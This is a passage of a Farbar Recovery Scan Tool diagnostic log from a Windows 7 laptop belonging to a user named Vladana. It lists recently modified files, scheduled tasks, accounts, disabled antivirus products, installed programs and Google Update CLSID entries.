2019-11-18 20:38 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-11-18 19:45 - 2013-03-19 22:08 - 000746014 _____ C:\Windows\system32\perfh00C.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000740656 _____ C:\Windows\system32\perfh015.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000714178 _____ C:\Windows\system32\prfh0416.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000684052 _____ C:\Windows\system32\perfh00E.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000607286 _____ C:\Windows\system32\perfh008.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000494812 _____ C:\Windows\system32\perfh014.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000479312 _____ C:\Windows\system32\perfh001.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000417076 _____ C:\Windows\system32\perfh011.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000171600 _____ C:\Windows\system32\perfc00E.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000156198 _____ C:\Windows\system32\perfc015.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000149906 _____ C:\Windows\system32\perfc00C.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000147982 _____ C:\Windows\system32\prfc0416.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000122426 _____ C:\Windows\system32\perfc011.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000111454 _____ C:\Windows\system32\perfc008.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000095730 _____ C:\Windows\system32\perfc014.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000095098 _____ C:\Windows\system32\perfc001.dat
2019-11-18 19:45 - 2013-03-19 15:24 - 000481800 _____ C:\Windows\system32\perfh00B.dat
2019-11-18 19:45 - 2013-03-19 15:24 - 000101846 _____ C:\Windows\system32\perfc00B.dat
2019-11-18 19:45 - 2009-07-14 06:13 - 007211860 _____ C:\Windows\system32\PerfStringBackup.INI
2019-11-18 19:45 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2019-11-18 19:28 - 2013-02-21 15:11 - 000000000 ____D C:\Program Files (x86)\Nokia
2019-11-18 13:46 - 2017-09-05 15:33 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Mp3tag
2019-11-18 02:26 - 2014-10-19 23:52 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\vlc
2019-11-17 22:16 - 2013-02-21 01:36 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Azureus
2019-11-17 02:16 - 2013-02-20 22:41 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2019-11-16 17:47 - 2019-05-23 11:52 - 000003160 _____ C:\Windows\system32\Tasks\{EF41326F-22E8-4DCF-A020-C6061802D389}
2019-11-16 17:47 - 2018-09-06 18:23 - 000003334 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2019-11-16 17:47 - 2018-09-06 18:23 - 000003206 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2019-11-16 17:47 - 2018-03-14 03:40 - 000004470 _____ C:\Windows\system32\Tasks\Adobe Flash Player NPAPI Notifier
2019-11-16 17:47 - 2016-03-23 08:37 - 000003052 _____ C:\Windows\system32\Tasks\SafeZone scheduled Autoupdate 1458718670
2019-11-16 17:47 - 2016-01-03 12:45 - 000003652 _____ C:\Windows\system32\Tasks\DivXUpdate
2019-11-16 17:47 - 2015-12-03 22:42 - 000000000 ____D C:\Windows\system32\Tasks\AVAST Software
2019-11-16 17:47 - 2015-06-10 12:59 - 000004458 _____ C:\Windows\system32\Tasks\Adobe Flash Player PPAPI Notifier
2019-11-16 17:47 - 2015-06-10 12:47 - 000003850 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1433936833
2019-11-16 17:47 - 2015-02-06 11:56 - 000003432 _____ C:\Windows\system32\Tasks\RealDownloader Update Check
2019-11-16 17:47 - 2015-01-06 11:27 - 000004476 _____ C:\Windows\system32\Tasks\Adobe Acrobat Update Task
2019-11-16 17:47 - 2014-07-14 00:42 - 000003226 _____ C:\Windows\system32\Tasks\{375818AB-9982-4CB0-BF65-E9B77DBF0F5C}
2019-11-16 17:47 - 2013-03-15 02:37 - 000003192 _____ C:\Windows\system32\Tasks\{6243CAD4-3DB1-45D4-933D-254A23B4CA85}
2019-11-16 17:47 - 2013-02-28 00:53 - 000003390 _____ C:\Windows\system32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-16 17:47 - 2013-02-21 21:07 - 000003508 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000UA
2019-11-16 17:47 - 2013-02-21 21:07 - 000003236 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000Core
2019-11-16 17:47 - 2013-02-20 22:41 - 000004312 _____ C:\Windows\system32\Tasks\Adobe Flash Player Updater
2019-11-16 17:46 - 2019-05-23 15:50 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2019-11-16 16:21 - 2013-02-20 22:23 - 000000000 ____D C:\Users\Vladana\AppData\Local\Microsoft Help
2019-11-16 15:55 - 2014-08-18 11:50 - 000000000 ____D C:\Program Files (x86)\Freemake
2019-11-16 14:54 - 2017-07-25 15:43 - 000000000 ____D C:\Users\Vladana\AppData\Local\FreemakeVideoConverter
2019-11-16 14:54 - 2014-08-18 11:50 - 000000000 ____D C:\ProgramData\Freemake
2019-11-16 13:48 - 2017-08-25 02:23 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ZenGuard GmbH
2019-11-15 19:04 - 2017-08-25 02:23 - 000000000 ____D C:\Users\Vladana\AppData\Local\SquirrelTemp
2019-11-15 17:02 - 2013-02-20 21:51 - 000000000 ____D C:\Users\Vladana\AppData\Local\Google
2019-11-13 21:40 - 2013-02-20 22:41 - 000842296 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe
2019-11-13 21:40 - 2013-02-20 22:41 - 000175160 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2019-11-13 21:40 - 2013-02-20 22:41 - 000000000 ____D C:\Windows\system32\Macromed
2019-11-11 15:42 - 2016-09-25 12:57 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Apowersoft
2019-11-11 01:33 - 2017-03-14 00:19 - 000004168 _____ C:\Windows\system32\Tasks\Avast Emergency Update
2019-11-11 01:28 - 2013-02-20 21:52 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2019-11-09 12:32 - 2017-04-16 10:33 - 000000000 ____D C:\Users\Vladana\AppData\LocalLow\Mozilla
2019-11-08 01:14 - 2018-09-06 18:24 - 000002184 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-11-08 01:14 - 2018-09-06 18:24 - 000002143 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-11-08 01:14 - 2018-09-06 18:24 - 000002143 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2019-11-07 18:44 - 2015-06-10 12:47 - 000000000 ____D C:\Program Files (x86)\Opera
2019-11-06 11:30 - 2016-09-05 13:58 - 000001271 _____ C:\Users\Vladana\Desktop\marker.txt
2019-11-05 05:03 - 2013-02-20 21:52 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Mozilla
2019-11-05 00:06 - 2015-10-15 21:00 - 000000000 ____D C:\Program Files (x86)\Google
2019-10-22 01:05 - 2017-09-05 14:37 - 000000000 ____D C:\Program Files (x86)\Mp3tag
 
==================== Files in the root of some directories ========
 
2013-04-12 20:07 - 2014-11-17 02:37 - 000000580 _____ () C:\Users\Vladana\AppData\Roaming\AutoGK.ini
2013-03-15 02:55 - 2014-11-18 03:36 - 000010752 _____ () C:\Users\Vladana\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-05-19 01:43 - 2015-05-19 01:43 - 000247298 _____ () C:\Users\Vladana\AppData\Local\Tempdivx84f8
2015-07-02 22:06 - 2015-07-02 22:06 - 000043682 _____ () C:\Users\Vladana\AppData\Local\Tempdivxffab
 
==================== SigCheck ============================
 
(There is no automatic fix for files that do not pass verification.)
 
 
LastRegBack: 2019-11-17 06:56
==================== End of FRST.txt ========================
 
 
Copy of Addition.txt:
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14-11-2019
Ran by Vladana (18-11-2019 20:55:45)
Running from C:\Users\Vladana\Desktop
Windows 7 Ultimate (X64) (2013-02-20 19:53:32)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-7682389-3612777877-391866582-500 - Administrator - Disabled)
Guest (S-1-5-21-7682389-3612777877-391866582-501 - Limited - Disabled)
Vladana (S-1-5-21-7682389-3612777877-391866582-1000 - Administrator - Enabled) => C:\Users\Vladana
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Avast Antivirus (Disabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Disabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
4K Video Downloader (HKLM-x32\...\4K Video Downloader) (Version:  - Open Media LLC)
ACDSee 10 Photo Manager (HKLM-x32\...\{F8B98EB6-FC06-45BF-87D4-9784E0408611}) (Version: 10.0.219 - ACD Systems International)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20063 - Adobe Systems Incorporated)
Adobe Flash Player 32 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 32.0.0.293 - Adobe)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.293 - Adobe)
Adobe Flash Player 32 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 32.0.0.293 - Adobe)
Adobe Shockwave Player 12.3 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.3.4.204 - Adobe Systems, Inc.)
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version:  - ALPS ELECTRIC CO., LTD.)
Apowersoft Online Launcher version 1.6.1 (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\{20BF67A8-D81A-4489-8225-FABAA0896E2D}_is1) (Version: 1.6.1 - APOWERSOFT LIMITED)
Auto Gordian Knot 2.55 (HKLM-x32\...\AutoGK) (Version: 2.55 - len0x)
Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 19.8.2393 - AVAST Software)
AVI ReComp 1.5.5 (HKLM-x32\...\AVI ReComp) (Version: 1.5.5 - Mateusz Gola (aka Prozac))
AviSynth 2.5 (HKLM-x32\...\AviSynth) (Version:  - )
Awesomium.NET Redistribution Module (HKLM-x32\...\{C34CAF35-6198-4EEB-970F-C61FC51D23BD}) (Version: 1.7.4.2 - ©2014 Awesomium Technologies LLC) Hidden
Bigasoft Total Video Converter 3.7.24.4700 (HKLM-x32\...\{a72ce741-1f32-4d79-bffb-a714375c678d}_is1) (Version:  - Bigasoft Corporation)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DivX Setup (HKLM\...\DivX Setup) (Version: 10.8.7.0 - DivX, LLC)
FileLab Plugin 1.1.33 (HKLM-x32\...\{6AC5F630-9453-433D-90FF-BB3A8E4F8960}) (Version: 1.1.33 - FileLab)
FJ Camera (HKLM-x32\...\{399C37FB-08AF-493B-BFED-20FBD85EDF7F}) (Version: 5.8.52032.0_WHQL - Sonix)
Freemake Video Converter version 4.1.10 (HKLM-x32\...\Freemake Video Converter_is1) (Version: 4.1.10 - Mixbyte Inc.)
Fujitsu Hotkey Utility (HKLM-x32\...\{C8E4B31D-337C-483D-822D-16F11441669B}) (Version: 3.70.0.0 - FUJITSU LIMITED) Hidden
Fujitsu Hotkey Utility (HKLM-x32\...\InstallShield_{C8E4B31D-337C-483D-822D-16F11441669B}) (Version: 3.70.0.0 - FUJITSU LIMITED)
Fujitsu MobilityCenter Extension Utility (HKLM\...\{EC314CDF-3521-482B-A21C-65AC95664814}) (Version: 4.01.00.000 - FUJITSU LIMITED) Hidden
Fujitsu MobilityCenter Extension Utility (HKLM-x32\...\InstallShield_{EC314CDF-3521-482B-A21C-65AC95664814}) (Version: 4.01.00.000 - FUJITSU LIMITED)
Fujitsu System Extension Utility (HKLM\...\{E8A5B78F-4456-4511-AB3D-E7BFFB974A7A}) (Version: 3.4.4.0 - FUJITSU LIMITED) Hidden
Fujitsu System Extension Utility (HKLM-x32\...\InstallShield_{E8A5B78F-4456-4511-AB3D-E7BFFB974A7A}) (Version: 3.4.4.0 - FUJITSU LIMITED)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 78.0.3904.97 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.341 - Google LLC) Hidden
Google Video Support Plugin (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\{F9B579C2-D854-300A-BE62-A09EB9D722E4}) (Version: 19.11.1200.0 - Google, LLC.)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel® OpenCL CPU Runtime (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version:  - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2696 - Intel Corporation)
Intel® PROSet/Wireless for Bluetooth® + High Speed (HKLM\...\{705EE775-5776-48FD-B704-C3C9CF535420}) (Version: 15.1.1.0170 - Intel Corporation)
Intel® PROSet/Wireless Software for Bluetooth® Technology (HKLM\...\{F0932859-AA60-459E-B843-0BDECA34E2C7}) (Version: 2.0.0.0086 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.0.0.1032 - Intel Corporation)
Intel® PROSet/Wireless WiFi Software (HKLM\...\{BAA0BE9B-9E6D-4802-91CB-FB7ED5CD4BEF}) (Version: 15.01.1500.1034 - Intel Corporation)
iPool (HKLM-x32\...\iPool) (Version: 2.2.03 - Memir Games)
iSnooker 2.2.60 (HKLM-x32\...\isnooker_memir_is1) (Version: 2.2.60 - Memir Games Ltd)
Java 8 Update 221 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180221F0}) (Version: 8.0.2210.11 - Oracle Corporation)
KeepVid Pro(Build 6.3.2.0) (HKLM-x32\...\KeepVid Pro_is1) (Version: 6.3.2.0 - KeepVid Studio)
LIFEBOOK Application Panel (HKLM\...\{6226477E-444F-4DFE-BA19-9F4F7D4565BC}) (Version: 8.3.2.0 - FUJITSU LIMITED) Hidden
LIFEBOOK Application Panel (HKLM-x32\...\InstallShield_{6226477E-444F-4DFE-BA19-9F4F7D4565BC}) (Version: 8.3.2.0 - FUJITSU LIMITED)
Malwarebytes version 3.4.5.2467 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.4.5.2467 - Malwarebytes)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Save as PDF or XPS Add-in for 2007 Microsoft Office programs (HKLM-x32\...\{90120000-00B2-0409-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\SkyDriveSetup.exe) (Version: 17.0.2006.0314 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Movie Maker (HKLM-x32\...\{5BABDA39-61CF-41EE-992D-4054B6649A9B}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{ED6C77F9-4D7E-447C-9EC0-9A212D075535}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Mozilla Firefox 70.0.1 (x64 en-US) (HKLM\...\Mozilla Firefox 70.0.1 (x64 en-US)) (Version: 70.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 70.0.1.7242 - Mozilla)
Mp3tag v2.99a (HKLM-x32\...\Mp3tag) (Version: 2.99a - Florian Heidenreich)
MSVC80_x64_v2 (HKLM\...\{4D668D4F-FAA2-4726-834C-31F4614F312E}) (Version: 1.0.3.0 - Nokia) Hidden
MSVC80_x86_v2 (HKLM-x32\...\{6D3245B1-8DB8-4A23-9CD2-2C90F40ABAF6}) (Version: 1.0.3.0 - Nokia) Hidden
MSVC90_x64 (HKLM\...\{AB071C8B-873C-459F-ACA9-9EBE03C3E89B}) (Version: 1.0.1.2 - Nokia) Hidden
MSVC90_x86 (HKLM-x32\...\{AF111648-99A1-453E-81DD-80DBBF6DAD0D}) (Version: 1.0.1.2 - Nokia) Hidden
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Noise Reduction Plug-In 2.0 (HKLM-x32\...\{B94515E1-2DD6-11E2-849E-F04DA23A5C58}) (Version: 2.0.515 - Sony)
Nokia Connectivity Cable Driver (HKLM-x32\...\{29373274-977E-413C-A4DE-DC0F8E80C429}) (Version: 7.1.172.0 - Nokia)
Nokia Software Updater (HKLM-x32\...\{7130468A-F53F-4698-8C09-A339EA3B05E6}) (Version: 3.0.655 - Nokia)
Nokia Suite (HKLM-x32\...\{88B6F9DE-C80F-4A70-ACF6-BEE933679170}) (Version: 3.8.54.0 - Nokia) Hidden
Nokia Suite (HKLM-x32\...\Nokia Suite) (Version: 3.8.54.0 - Nokia)
Opera Stable 64.0.3417.92 (HKLM-x32\...\Opera 64.0.3417.92) (Version: 64.0.3417.92 - Opera Software)
PC Connectivity Solution (HKLM-x32\...\{6D01D1B1-17BD-4F10-BB11-F08F0C47D42B}) (Version: 12.0.109.0 - Nokia)
PeaZip 5.2.0 (HKLM-x32\...\{5A2BC38A-406C-4A5B-BF45-6991F9A05325}_is1) (Version:  - Giorgio Tani)
Plugfree NETWORK (HKLM\...\{7BA64D21-EE46-4a9a-8145-52B0175C3F86}) (Version: 6.2.0.1 - FUJITSU LIMITED)
Plugfree NETWORK (HKLM\...\{E1C056BE-ACC9-4FCF-B37D-55A46648B369}) (Version: 6.2.001 - FUJITSU LIMITED) Hidden
Power Saving Utility (HKLM-x32\...\{49A588CF-5FD4-4774-BFBF-0764287DE82B}) (Version: 32.01.10.043 - FUJITSU LIMITED)
QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.)
RealDownloader (HKLM-x32\...\{6FCD4D5A-20B9-4D79-ABA5-4E7048944025}) (Version: 17.0.15.4 - RealNetworks, Inc.) Hidden
RealDownloader (HKLM-x32\...\{e6171278-8759-449d-9e0b-c1825debc2ad}) (Version: 17.0.15.7 - RealNetworks) Hidden
RealDownloader (HKLM-x32\...\{FBEFDC9E-F8FB-4B66-A78B-09B7B380D59D}) (Version: 17.0.15.7 - RealNetworks) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (HKLM-x32\...\{7770E71B-2D43-4800-9CB3-5B6CAAEBEBEA}) (Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (HKLM\...\{21E47F47-C9A7-4454-BA48-388327B0EA00}) (Version: 10.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (HKLM-x32\...\{AAECF7BA-E83B-4A10-87EA-DE0B333F8734}) (Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer Cloud (HKLM-x32\...\RealPlayer 17.0) (Version: 17.0.15 - RealNetworks)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.53.216.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6526 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7601.30129 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (HKLM-x32\...\{28C2DED6-325B-4CC7-983A-1777C8F7FBAB}) (Version: 1.1.0 - RealNetworks, Inc.) Hidden
SafeZone Stable 1.48.2066.44 (HKLM-x32\...\SafeZone 1.48.2066.44) (Version: 1.48.2066.44 - Avast Software) Hidden
SolveigMM AVI Trimmer (HKLM-x32\...\SolveigMM AVI Trimmer 2.0.1210.11) (Version: 2.0.1210.11 - Solveig Multimedia)
Sound Forge Pro 10.0 (HKLM-x32\...\{8EF5E2B0-2DD1-11E2-89A5-F04DA23A5C58}) (Version: 10.0.507 - Sony)
Spotify (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Spotify) (Version: 1.1.8.439.g8502297d - Spotify AB)
Subtitle Edit 3.4.3 (HKLM-x32\...\SubtitleEdit_is1) (Version: 3.4.3.0 - Nikse)
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Total Commander (Remove or Repair) (HKLM-x32\...\Totalcmd) (Version:  - )
Unity Web Player (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
UpdateService (HKLM-x32\...\{E3AE96D6-E196-45B4-AF62-2B41998B9E37}) (Version: 1.0.0 - RealNetworks, Inc.) Hidden
VC80CRTRedist - 8.0.50727.6195 (HKLM-x32\...\{933B4015-4618-4716-A828-5289FC03165F}) (Version: 1.2.0 - DivX, Inc) Hidden
VCRedistSetup (HKLM-x32\...\{3921A67A-5AB1-4E48-9444-C71814CF3027}) (Version: 1.0.0 - Nero AG) Hidden
Video Download Capture version 6.2.8 (HKLM-x32\...\{b3336f66-e079-4ff6-abdb-51e2fab781d5}_is1) (Version: 6.2.8 - APOWERSOFT LIMITED)
Video Downloader (HKLM-x32\...\{62796191-6F12-4ABE-BA8B-B4D4A266C997}) (Version: 1.0.0 - RealNetworks) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.8 - VideoLAN)
VobSub v2.23 (Remove Only) (HKLM-x32\...\VobSub) (Version:  - )
Vuze (HKLM-x32\...\8461-7759-5462-8226) (Version: 5.7.6.0 - Azureus Software, Inc.)
Winamp (HKLM-x32\...\Winamp) (Version: 5.623  - Nullsoft, Inc)
Winamp Detector Plug-in (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Winamp Detect) (Version: 1.0.0.1 - Nullsoft, Inc)
Windows Driver Package - Nokia pccsmcfd LegacyDriver  (05/31/2012 7.1.2.0) (HKLM\...\62BBD193ADFDBB228C7E1ADB56463F5732FF7F6F) (Version: 05/31/2012 7.1.2.0 - Nokia)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)
WinRAR archiver (HKLM-x32\...\WinRAR archiver) (Version:  - )
Wondershare Filmora(Build 8.5.3) (HKLM\...\Wondershare Filmora_is1) (Version:  - Wondershare Software)
Wondershare Helper Compact 2.5.2 (HKLM-x32\...\{5363CE84-5F09-48A1-8B6C-6BB590FFEDF2}_is1) (Version: 2.5.2 - Wondershare)
XviD MPEG4 Video Codec (remove only) (HKLM-x32\...\XviD MPEG4 Video Codec) (Version:  - )
ZD Soft Screen Recorder 11.2.0 (HKLM-x32\...\{05289906-8CDE-44FD-9FA5-95866BF511A9}) (Version: 11.2.0.0 - ZD Soft)
 
==================== Custom CLSID (Whitelisted): ==============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{62634D95-960B-4834-8E71-A70408AD8FD9}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.34.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
